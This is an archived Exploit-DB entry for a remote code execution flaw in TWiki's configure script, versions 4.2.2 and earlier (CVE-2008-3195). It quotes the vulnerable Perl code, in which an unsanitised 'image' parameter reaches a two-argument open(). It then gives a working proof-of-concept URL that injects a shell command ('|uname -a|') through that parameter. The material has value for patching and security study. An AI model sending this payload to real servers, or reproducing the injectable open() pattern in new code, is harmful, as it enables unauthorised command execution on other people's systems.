TWiki <= 4.2.2 action Remote Code Execution Vulnerability

ID EDB-ID:6509
Type exploitdb
Reporter webDEViL
Modified 2008-09-21T00:00:00


TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability. CVE-2008-3195,CVE-2008-4112. Webapps exploit for cgi platform

                                            #-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------TWiki Remote Code Execution &lt;= 4.2.2--------------------#

# ----------developers site:
# ----------CVE Id(s)      : CVE-2008-3195--------------------------#


The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion.

According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;)

Vulnerable code:

if( $action eq 'image' ) {
    # SMELL: this call is correct, but causes a perl error

    # on some versions of
    # print $query-&gt;header(-type =&gt; $query-&gt;param('type'));
    # So use this instead:
    print 'Content-type: '.$query-&gt;param('type')."\n\n";

    if( open(F, 'logos/'.$query-&gt;param('image' ))) {
        local $/ = undef;
        print &lt;F&gt;;


http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain

# [2008-09-21]